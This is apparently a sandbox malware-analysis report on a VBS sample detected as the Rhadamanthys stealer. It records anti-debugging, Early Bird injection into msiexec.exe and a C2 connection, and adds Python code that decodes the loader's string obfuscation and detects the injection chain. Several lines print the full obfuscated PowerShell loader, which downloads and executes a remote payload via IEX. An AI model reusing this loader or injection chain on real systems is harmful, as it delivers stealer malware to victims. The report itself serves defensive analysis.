                        Anti Debugging

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\msiexec.exe; Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\msiexec.exe; Process queried: DebugPort
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 8_2_04D69488 LdrInitializeThunk,LdrInitializeThunk, 8_2_04D69488
Source: C:\Windows\SysWOW64\svchost.exe; Code function: 11_3_032C0283 mov eax, dword ptr fs:[00000030h] 11_3_032C0283

                        HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\svchost.exe; Network Connect: 45.149.241.141 2023
Source: Yara match; File source: amsi64_5752.amsi.csv, type: OTHER
Source: Yara match; File source: Process Memory Space: powershell.exe PID: 5752, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: powershell.exe PID: 4948, type: MEMORYSTR
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Memory written: C:\Windows\SysWOW64\msiexec.exe base: 41A0000
Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumber
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Anhemitonic63='Unclever';;$Brescian='debauchedly';;$thunderhead='Reservationsdatoers';;$Graadens='Dogernes';;$Eksplosionsmotorernes47=$host.Name; function Resubmerging($Dagsproduktionernestjeneste){If ($Eksplosionsmotorernes47) {$Satirizers='Flippermaskiners';$Heterogenes=2;$Dagsproduktionerne=$Heterogenes}do{$laboratorieplanlgningers+=$Dagsproduktionernestjeneste[$Dagsproduktionerne];$Dagsproduktionerne+=3} until(!$Dagsproduktionernestjeneste[$Dagsproduktionerne])$laboratorieplanlgningers}function Impalement($Lucern179){ .($Raaderet113) ($Lucern179)}$Aabningshaand=Resubmerging 'Sun,reSlTSy. rw';$Aabningshaand+=Resubmerging 'BeE.lBSyCSpLKai CeShn t';$Stikkelsbrbens127=Resubmerging 'FoMAmoEtzOriFyl Pl DaRe/';$Telemetered=Resubmerging 'AtT SlGus s1 I2';$Dagsproduktionernendows='Pl[AcnP EOrtEu.Nos ae,mrUavS,iS c pEMaPS o yiDon DtB M a cn.jaMaGUnEJerlo]Ca: :SkS eeTacBlU urPiiBit AYBep ORInoM TEloTaCFao.nl B=Sc$IntMie LReeTemKuEViTP.eUdrLiEK D';$Stikkelsbrbens127+=Resubmerging 'S 5 r.,a0Sn Pe(F W MiannArdDioVswRes BeNApTA Pl1 r0Ra. e0Li; o CrWJeiUnnDi6Ne4Fo;fo PixRe6F 4R ; D F rBuv h:Lk1Hi3 T1 u.Ep0 H) S StG EeRac.ekBuo T/ 2 G0Op1 .0Fe0Sc1 O0Sq1Ne BlF Pi UrFoe fAnoAlxFr/,r1 .3B,1.i. S0';$Centas=Resubmerging ',oU s SE CrSc- Ma g deHyN UT';$morbidise=Resubmerging 'Ovh ntU tTipTrsDr:Ra/Ou/ ,w Sw NwFi. ttC dUne BjDibta.Kic so .m v/SukPopEl/HaE kpPei.il ea rc lhCrnSwa.t. ,qMuxEfdPu>.ah Pt Bttrprns a:Co/Sv/ Lw dwK.wS . fUdt AsG ePrnGigT iMon leMeeHorV sCa. 
BcUfoBrm T/KakScmWo/ OENepAuiJalHaaRicfihHonLeaAk.OlqMux Cd';$Dixenite=Resubmerging 'Sc>';$Raaderet113=Resubmerging ' ,I ePaX';$Feminologisk='Bestrr';$klerum='\Enspndervognes.Eks';Impalement (Resubmerging ' K$ sgN lIno bgiAPrl C:UnrA a ,bOvAD lGedRveRerReMTed RE.e=O,$ le ,N FV C: BAScp .pQudLraFoTprASk+b.$SpKFeLU E nRLauSeM');Impalement (Resubmerging ' S$ GC.lKoO pbUcAS lO,:DiGLaAilsMatVaR OO gm ,E nNvitoAVi=Ta$FoMO oEurUrb BIRedSpi Ssane p.PrsInP el PiSktKo( d$b d FI oXInE enC IGgTUdEUn)');Impalement (Resubmerging $Dagsproduktionernendows);$morbidise=$gastromenia[0];$Parfumens=(Resubmerging 'Lr$moG KlBiO ebUgaFiL P:P dHyEHeC ,AIlL lCScIskf DyDiIBrnNeG =LaN DEMaW -Jeo HBssJ Ce FCflTRa uSS.Yp StatUneFuMKr.H $ UAN aScbNonA.I JNH gYosN H eAL ASknT D');Impalement ($Parfumens);Impalement (Resubmerging 'C $ ADDee jc yaS,lVecT,iK.fk,y BiDdntig p.TrHaneUnaS.dH e Rr usIm[ D$ SC .e SnUntM,a.es G]I,=Bl$prSTotPaiPikvikN,e UlTrsEkbArrSvb ieCun s A1Ud2 a7');$Nonappreciative=Resubmerging 'Im$KaDPie .cFia .lIncGui,nf .yUkiAsn g.d. SD o.lwEunSulUno RaP dUlFC iInlEfeTi(Ty$ ,m EovarKabEniBrdCaisasileFl,Fr$S.S ooJak TlT e.ptAnt feUnnAn7K,6 O)';$Sokletten76=$Rabaldermde;Impalement (Resubmerging ',e$T gliL vOMaB BAAplUm: S ,T vOReS ,NTuI.xN.uG e rnL,s e=.a(PaTSneL.SsttTr-GePUra,eTCoHE D $KySMaO Hk .LIbEd tChT SEV,nra7Re6Va)');while (!$Stosningens) {Impalement (Resubmerging 'Mu$EpgShlJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\msiexec.exe; Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$anhemitonic63='unclever';;$brescian='debauchedly';;$thunderhead='reservationsdatoers';;$graadens='dogernes';;$eksplosionsmotorernes47=$host.name; function resubmerging($dagsproduktionernestjeneste){if ($eksplosionsmotorernes47) {$satirizers='flippermaskiners';$heterogenes=2;$dagsproduktionerne=$heterogenes}do{$laboratorieplanlgningers+=$dagsproduktionernestjeneste[$dagsproduktionerne];$dagsproduktionerne+=3} until(!$dagsproduktionernestjeneste[$dagsproduktionerne])$laboratorieplanlgningers}function impalement($lucern179){ .($raaderet113) ($lucern179)}$aabningshaand=resubmerging 'sun,resltsy. rw';$aabningshaand+=resubmerging 'bee.lbsycsplkai ceshn t';$stikkelsbrbens127=resubmerging 'fomamoetzorifyl pl dare/';$telemetered=resubmerging 'att slgus s1 i2';$dagsproduktionernendows='pl[acnp eorteu.nos ae,mruavs,is c pemaps o yidon dtb m a cn.jamagunejerlo]ca: :sks eetacblu urpiibit aybep orinom telotacfao.nl b=sc$intmie lreetemkuevitp.eudrliek d';$stikkelsbrbens127+=resubmerging 's 5 r.,a0sn pe(f w miannarddiovswres benapta pl1 r0ra. e0li; o crwjeiunndi6ne4fo;fo pixre6f 4r ; d f rbuv h:lk1hi3 t1 u.ep0 h) s stg eerac.ekbuo t/ 2 g0op1 .0fe0sc1 o0sq1ne blf pi urfoe fanoalxfr/,r1 .3b,1.i. s0';$centas=resubmerging ',ou s se crsc- ma g dehyn ut';$morbidise=resubmerging 'ovh ntu ttiptrsdr:ra/ou/ ,w sw nwfi. ttc dune bjdibta.kic so .m v/sukpopel/hae kppei.il ea rc lhcrnswa.t. ,qmuxefdpu>.ah pt bttrprns a:co/sv/ lw dwk.ws . fudt asg eprngigt imon lemeehorv sca. 
bcufobrm t/kakscmwo/ oenepauijalhaaricfihhonleaak.olqmux cd';$dixenite=resubmerging 'sc>';$raaderet113=resubmerging ' ,i epax';$feminologisk='bestrr';$klerum='\enspndervognes.eks';impalement (resubmerging ' k$ sgn lino bgiaprl c:unra a ,bovad lgedrvererremted re.e=o,$ le ,n fv c: bascp .pqudlrafotprask+b.$spkfelu e nrlausem');impalement (resubmerging ' s$ gc.lkoo pbucas lo,:diglaailsmatvar oo gm ,e nnvitoavi=ta$fomo oeururb biredspi ssane p.prsinp el pisktko( d$b d fi oxine enc iggtudeun)');impalement (resubmerging $dagsproduktionernendows);$morbidise=$gastromenia[0];$parfumens=(resubmerging 'lr$mog klbio ebugafil p:p dhyehec ,aill lcsciskf dydiibrnneg =lan demaw -jeo hbssj ce fcfltra uss.yp statunefumkr.h $ uan ascbnona.i jnh gyosn h eal asknt d');impalement ($parfumens);impalement (resubmerging 'c $ addee jc yas,lvect,ik.fk,y biddntig p.trhaneunas.dh e rr usim[ d$ sc .e snuntm,a.es g]i,=bl$prstotpaipikvikn,e ultrsekbarrsvb iecun s a1ud2 a7');$nonappreciative=resubmerging 'im$kadpie .cfia .lincgui,nf .yukiasn g.d. sd o.lweunsuluno rap dulfc iinlefeti(ty$ ,m eovarkabenibrdcaisasilefl,fr$s.s oojak tlt e.ptant feunnan7k,6 o)';$sokletten76=$rabaldermde;impalement (resubmerging ',e$t glil vomab baaplum: s ,t vores ,ntui.xn.ug e rnl,s e=.a(patsnel.sstttr-gepura,etcohe d $kysmao hk .libed tcht sev,nra7re6va)');while (!$stosningens) {impalement (resubmerging 'mu$epgshl
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" ";$anhemitonic63='unclever';;$brescian='debauchedly';;$thunderhead='reservationsdatoers';;$graadens='dogernes';;$eksplosionsmotorernes47=$host.name; function resubmerging($dagsproduktionernestjeneste){if ($eksplosionsmotorernes47) {$satirizers='flippermaskiners';$heterogenes=2;$dagsproduktionerne=$heterogenes}do{$laboratorieplanlgningers+=$dagsproduktionernestjeneste[$dagsproduktionerne];$dagsproduktionerne+=3} until(!$dagsproduktionernestjeneste[$dagsproduktionerne])$laboratorieplanlgningers}function impalement($lucern179){ .($raaderet113) ($lucern179)}$aabningshaand=resubmerging 'sun,resltsy. rw';$aabningshaand+=resubmerging 'bee.lbsycsplkai ceshn t';$stikkelsbrbens127=resubmerging 'fomamoetzorifyl pl dare/';$telemetered=resubmerging 'att slgus s1 i2';$dagsproduktionernendows='pl[acnp eorteu.nos ae,mruavs,is c pemaps o yidon dtb m a cn.jamagunejerlo]ca: :sks eetacblu urpiibit aybep orinom telotacfao.nl b=sc$intmie lreetemkuevitp.eudrliek d';$stikkelsbrbens127+=resubmerging 's 5 r.,a0sn pe(f w miannarddiovswres benapta pl1 r0ra. e0li; o crwjeiunndi6ne4fo;fo pixre6f 4r ; d f rbuv h:lk1hi3 t1 u.ep0 h) s stg eerac.ekbuo t/ 2 g0op1 .0fe0sc1 o0sq1ne blf pi urfoe fanoalxfr/,r1 .3b,1.i. s0';$centas=resubmerging ',ou s se crsc- ma g dehyn ut';$morbidise=resubmerging 'ovh ntu ttiptrsdr:ra/ou/ ,w sw nwfi. ttc dune bjdibta.kic so .m v/sukpopel/hae kppei.il ea rc lhcrnswa.t. ,qmuxefdpu>.ah pt bttrprns a:co/sv/ lw dwk.ws . fudt asg eprngigt imon lemeehorv sca. 
bcufobrm t/kakscmwo/ oenepauijalhaaricfihhonleaak.olqmux cd';$dixenite=resubmerging 'sc>';$raaderet113=resubmerging ' ,i epax';$feminologisk='bestrr';$klerum='\enspndervognes.eks';impalement (resubmerging ' k$ sgn lino bgiaprl c:unra a ,bovad lgedrvererremted re.e=o,$ le ,n fv c: bascp .pqudlrafotprask+b.$spkfelu e nrlausem');impalement (resubmerging ' s$ gc.lkoo pbucas lo,:diglaailsmatvar oo gm ,e nnvitoavi=ta$fomo oeururb biredspi ssane p.prsinp el pisktko( d$b d fi oxine enc iggtudeun)');impalement (resubmerging $dagsproduktionernendows);$morbidise=$gastromenia[0];$parfumens=(resubmerging 'lr$mog klbio ebugafil p:p dhyehec ,aill lcsciskf dydiibrnneg =lan demaw -jeo hbssj ce fcfltra uss.yp statunefumkr.h $ uan ascbnona.i jnh gyosn h eal asknt d');impalement ($parfumens);impalement (resubmerging 'c $ addee jc yas,lvect,ik.fk,y biddntig p.trhaneunas.dh e rr usim[ d$ sc .e snuntm,a.es g]i,=bl$prstotpaipikvikn,e ultrsekbarrsvb iecun s a1ud2 a7');$nonappreciative=resubmerging 'im$kadpie .cfia .lincgui,nf .yukiasn g.d. sd o.lweunsuluno rap dulfc iinlefeti(ty$ ,m eovarkabenibrdcaisasilefl,fr$s.s oojak tlt e.ptant feunnan7k,6 o)';$sokletten76=$rabaldermde;impalement (resubmerging ',e$t glil vomab baaplum: s ,t vores ,ntui.xn.ug e rnl,s e=.a(patsnel.sstttr-gepura,etcohe d $kysmao hk .libed tcht sev,nra7re6va)');while (!$stosningens) {impalement (resubmerging 'mu$epgshl
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$anhemitonic63='unclever';;$brescian='debauchedly';;$thunderhead='reservationsdatoers';;$graadens='dogernes';;$eksplosionsmotorernes47=$host.name; function resubmerging($dagsproduktionernestjeneste){if ($eksplosionsmotorernes47) {$satirizers='flippermaskiners';$heterogenes=2;$dagsproduktionerne=$heterogenes}do{$laboratorieplanlgningers+=$dagsproduktionernestjeneste[$dagsproduktionerne];$dagsproduktionerne+=3} until(!$dagsproduktionernestjeneste[$dagsproduktionerne])$laboratorieplanlgningers}function impalement($lucern179){ .($raaderet113) ($lucern179)}$aabningshaand=resubmerging 'sun,resltsy. rw';$aabningshaand+=resubmerging 'bee.lbsycsplkai ceshn t';$stikkelsbrbens127=resubmerging 'fomamoetzorifyl pl dare/';$telemetered=resubmerging 'att slgus s1 i2';$dagsproduktionernendows='pl[acnp eorteu.nos ae,mruavs,is c pemaps o yidon dtb m a cn.jamagunejerlo]ca: :sks eetacblu urpiibit aybep orinom telotacfao.nl b=sc$intmie lreetemkuevitp.eudrliek d';$stikkelsbrbens127+=resubmerging 's 5 r.,a0sn pe(f w miannarddiovswres benapta pl1 r0ra. e0li; o crwjeiunndi6ne4fo;fo pixre6f 4r ; d f rbuv h:lk1hi3 t1 u.ep0 h) s stg eerac.ekbuo t/ 2 g0op1 .0fe0sc1 o0sq1ne blf pi urfoe fanoalxfr/,r1 .3b,1.i. s0';$centas=resubmerging ',ou s se crsc- ma g dehyn ut';$morbidise=resubmerging 'ovh ntu ttiptrsdr:ra/ou/ ,w sw nwfi. ttc dune bjdibta.kic so .m v/sukpopel/hae kppei.il ea rc lhcrnswa.t. ,qmuxefdpu>.ah pt bttrprns a:co/sv/ lw dwk.ws . fudt asg eprngigt imon lemeehorv sca. 
bcufobrm t/kakscmwo/ oenepauijalhaaricfihhonleaak.olqmux cd';$dixenite=resubmerging 'sc>';$raaderet113=resubmerging ' ,i epax';$feminologisk='bestrr';$klerum='\enspndervognes.eks';impalement (resubmerging ' k$ sgn lino bgiaprl c:unra a ,bovad lgedrvererremted re.e=o,$ le ,n fv c: bascp .pqudlrafotprask+b.$spkfelu e nrlausem');impalement (resubmerging ' s$ gc.lkoo pbucas lo,:diglaailsmatvar oo gm ,e nnvitoavi=ta$fomo oeururb biredspi ssane p.prsinp el pisktko( d$b d fi oxine enc iggtudeun)');impalement (resubmerging $dagsproduktionernendows);$morbidise=$gastromenia[0];$parfumens=(resubmerging 'lr$mog klbio ebugafil p:p dhyehec ,aill lcsciskf dydiibrnneg =lan demaw -jeo hbssj ce fcfltra uss.yp statunefumkr.h $ uan ascbnona.i jnh gyosn h eal asknt d');impalement ($parfumens);impalement (resubmerging 'c $ addee jc yas,lvect,ik.fk,y biddntig p.trhaneunas.dh e rr usim[ d$ sc .e snuntm,a.es g]i,=bl$prstotpaipikvikn,e ultrsekbarrsvb iecun s a1ud2 a7');$nonappreciative=resubmerging 'im$kadpie .cfia .lincgui,nf .yukiasn g.d. sd o.lweunsuluno rap dulfc iinlefeti(ty$ ,m eovarkabenibrdcaisasilefl,fr$s.s oojak tlt e.ptant feunnan7k,6 o)';$sokletten76=$rabaldermde;impalement (resubmerging ',e$t glil vomab baaplum: s ,t vores ,ntui.xn.ug e rnl,s e=.a(patsnel.sstttr-gepura,etcohe d $kysmao hk .libed tcht sev,nra7re6va)');while (!$stosningens) {impalement (resubmerging 'mu$epgshlJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (7 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (7 entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
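The powershell.exe command lines recorded above define two helpers: Resubmerging, a do/until loop that starts at index 2 and appends every third character of its argument, and Impalement, which dot-sources whatever Resubmerging returns through .($Raaderet113). Every string literal in the script is stored in that padded form. The decoder below is an added example written for this report, not code from the report or from the loader; the obfuscate helper, the LITERAL_RE regex and SAMPLE_SCRIPT are constructed for the demonstration. One caveat matters when decoding the literals as printed on this page: the HTML rendering collapsed runs of spaces, so the printed copies do not decode cleanly. For example the first literal 'Sun,reSlTSy. rw' yields "neT.w", the start of Net.WebClient, while ' ,I ePaX' (the value of $Raaderet113) yields "IP"; restoring one space, ' ,I  ePaX', yields "IeX", the invoker that Impalement needs. Decode from the raw command line in the sandbox's process tree or from the AMSI capture, not from the rendered page.

```python
"""Decoder for the every-third-character string obfuscation used by the
PowerShell stage of this sample (Resubmerging / Impalement).
Added example, not code from the report or the loader; SAMPLE_SCRIPT below is
constructed in the same shape as the real command line."""
import itertools
import re

# The script's Resubmerging function: start at index 2, step by 3.
RESUBMERGING_START = 2
RESUBMERGING_STEP = 3


def resubmerging(blob: str, start: int = RESUBMERGING_START,
                 step: int = RESUBMERGING_STEP) -> str:
    """Port of the do/until loop: blob[2], blob[5], blob[8], ... until the
    index runs past the end of the string."""
    return blob[start::step]


def obfuscate(plain: str, start: int = RESUBMERGING_START,
              step: int = RESUBMERGING_STEP,
              junk: str = "abcdefghijklmnopqrstuvwxyz") -> str:
    """Inverse transform, used here to build test material: `start` filler
    characters, then each real character separated by `step - 1` filler
    characters. The filler alphabet is a constructed choice; the real loader
    pads with arbitrary mixed-case letters, punctuation and spaces."""
    filler = itertools.cycle(junk)
    pad = lambda n: "".join(next(filler) for _ in range(n))
    out = [pad(start)]
    for i, ch in enumerate(plain):
        if i:
            out.append(pad(step - 1))
        out.append(ch)
    return "".join(out)


# Single-quoted literal handed to Resubmerging. The call that passes a variable
# instead ($Dagsproduktionernendows in the report) is not matched.
LITERAL_RE = re.compile(r"Resubmerging\s+'([^']*)'", re.IGNORECASE)


def decode_literals(script: str) -> list[str]:
    """Decode every Resubmerging '...' literal in the order it appears."""
    return [resubmerging(m) for m in LITERAL_RE.findall(script)]


def find_invoke_expression(decoded: list[str]) -> list[str]:
    """Return the decoded fragments that name the dot-sourced invoker; in the
    report that value lives in $Raaderet113 and Impalement runs
    .($Raaderet113) ($payload)."""
    return [d for d in decoded if d.lower() in ("iex", "invoke-expression")]


# Constructed stand-in for the opening of the loader: variables assigned from
# Resubmerging literals, then Impalement (Resubmerging '...') to run a line.
SAMPLE_SCRIPT = (
    "$Raaderet113=Resubmerging '" + obfuscate("IeX") + "';"
    "$Aabningshaand=Resubmerging '" + obfuscate("Net.WebClient") + "';"
    "Impalement (Resubmerging '"
    + obfuscate("$wc = New-Object $Aabningshaand") + "');"
)

if __name__ == "__main__":
    decoded = decode_literals(SAMPLE_SCRIPT)
    for fragment in decoded:
        print(repr(fragment))
    print("invoker fragments:", find_invoke_expression(decoded))
```

Running the script against SAMPLE_SCRIPT prints the three plaintext fragments and flags "IeX". Against a real command line taken from the process tree, decode_literals gives the fragments in source order, which is enough to read off the User-Agent, the download URL pair and the file name without executing anything; the variable-based call still has to be followed by hand.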

                        Stealing of Sensitive Information

Source: Yara match; File source: 0000000B.00000003.2196496080.0000000003880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000003.2200198942.0000000021050000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000003.2192874424.0000000000100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                        Remote Access Functionality

Source: Yara match; File source: 0000000B.00000003.2196496080.0000000003880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000003.2200198942.0000000021050000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000003.2192874424.0000000000100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\svchost.exe; Code function: 11_2_05B6AB70 socket,WSAGetLastError,SetHandleInformation,GetLastError,closesocket,bind,WSAGetLastError, 11_2_05B6AB70
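The HIPS / PFW section above records the injection chain in four separate entries for the same pair of processes: powershell.exe creates msiexec.exe ("Process created / APC Queued / Resumed"), writes to it ("Memory written ... base: 41A0000"), queues an APC on it ("Thread APC queued"), and the new process then spawns svchost.exe. Correlating those calls per (source, target) pair is how the "Early bird" signature is produced. The following is an added example written for this report, not code from the report or from Joe Sandbox; SAMPLE_TRACE is a constructed API trace whose PIDs, field names and the benign control cases are assumptions chosen to mirror the chain observed here.

```python
"""Correlating an Early Bird APC injection chain from per-call API events.
Added example, not part of the Joe Sandbox report. SAMPLE_TRACE is constructed;
PIDs, field names and the benign control sequences are assumptions."""
from collections import defaultdict

# Call order that defines the technique: the child is created suspended, code
# is written into it, an APC is queued on its primary thread and the thread is
# resumed, so the APC runs before the image entry point executes.
EARLY_BIRD_CHAIN = ("CreateProcess", "WriteProcessMemory",
                    "QueueUserAPC", "ResumeThread")
CREATE_SUSPENDED = 0x00000004  # dwCreationFlags bit of CreateProcessW


def find_early_bird(events):
    """events: iterable of dicts with keys pid, api, target_pid and, for
    CreateProcess, flags. Returns (source_pid, target_pid) pairs for which the
    whole chain appeared in order between the same two processes. Unrelated
    calls in between (VirtualAllocEx, NtProtectVirtualMemory, ...) are ignored;
    a pair's progress resets whenever the target is created again."""
    progress = defaultdict(int)      # (src, dst) -> index of next expected call
    hits = []
    for ev in events:
        key = (ev["pid"], ev["target_pid"])
        if ev["api"] == "CreateProcess":
            # Only a suspended create can host a pre-entry-point APC.
            progress[key] = 1 if ev.get("flags", 0) & CREATE_SUSPENDED else 0
            continue
        step = progress[key]
        if 0 < step < len(EARLY_BIRD_CHAIN) and ev["api"] == EARLY_BIRD_CHAIN[step]:
            progress[key] = step + 1
            if progress[key] == len(EARLY_BIRD_CHAIN):
                hits.append(key)
    return hits


# Constructed trace. The first block mirrors the report's chain
# (powershell.exe -> msiexec.exe, write at base 0x41A0000, APC, resume).
SAMPLE_TRACE = [
    {"pid": 1000, "api": "CreateProcess", "target_pid": 1001,
     "flags": CREATE_SUSPENDED, "image": r"C:\Windows\SysWOW64\msiexec.exe"},
    {"pid": 1000, "api": "VirtualAllocEx", "target_pid": 1001},
    {"pid": 1000, "api": "WriteProcessMemory", "target_pid": 1001, "base": 0x41A0000},
    {"pid": 1000, "api": "QueueUserAPC", "target_pid": 1001},
    {"pid": 1000, "api": "ResumeThread", "target_pid": 1001},
    # Debugger-style: suspended create and a write, but no APC before resume.
    {"pid": 2000, "api": "CreateProcess", "target_pid": 2001, "flags": CREATE_SUSPENDED},
    {"pid": 2000, "api": "WriteProcessMemory", "target_pid": 2001},
    {"pid": 2000, "api": "ResumeThread", "target_pid": 2001},
    # Same four calls, but the child was not created suspended: still APC
    # injection, not the Early Bird variant this correlation targets.
    {"pid": 3000, "api": "CreateProcess", "target_pid": 3001, "flags": 0},
    {"pid": 3000, "api": "WriteProcessMemory", "target_pid": 3001},
    {"pid": 3000, "api": "QueueUserAPC", "target_pid": 3001},
    {"pid": 3000, "api": "ResumeThread", "target_pid": 3001},
]

if __name__ == "__main__":
    for src, dst in find_early_bird(SAMPLE_TRACE):
        print(f"early bird injection: pid {src} -> pid {dst}")
```

The rule deliberately keys on the suspended create: an APC queued into an already-running target is a different (and noisier) pattern, and a suspended create followed only by writes and a resume is what a debugger or a DLL-injecting launcher also produces. When the four calls are available from an EDR or ETW feed rather than a sandbox trace, the same state machine applies; the only change is mapping the native names (NtCreateUserProcess, NtWriteVirtualMemory, NtQueueApcThread, NtResumeThread) onto EARLY_BIRD_CHAIN.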
MITRE ATT&CK Matrix (reconstructed from the flattened table: each tactic column is listed top to bottom, and a number after a technique is the count badge the report shows beside it)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Scripting (221); Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation (111); Command and Scripting Interpreter (2); Exploitation for Client Execution (1); PowerShell (2); Launchd; Scheduled Task
Persistence: Scripting (221); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (411); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (241); Process Injection (411); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1)
Credential Access: Input Capture (21); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (321); Process Discovery (1); Virtualization/Sandbox Evasion (241); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (213)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Input Capture (21); Archive Collected Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Non-Standard Port (1); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (13); Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph (ID: 1578226, Sample: 0iTxQouy7k.vbs, Start date: 19/12/2024, Architecture: WINDOWS, Score: 100)

The graph image is not reproduced here; its node labels (process names with the graph's count badges), DNS/IP annotations and signatures are listed below as a process tree.

Start (0iTxQouy7k.vbs)
  DNS/IP: www.tdejb.com; tdejb.com
  Signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected RHADAMANTHYS Stealer; 5 other signatures
  Started: powershell.exe 18; wscript.exe 1

powershell.exe 18
  Signatures: Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; 2 other signatures
  Started: msiexec.exe 1 6; conhost.exe

  msiexec.exe 1 6
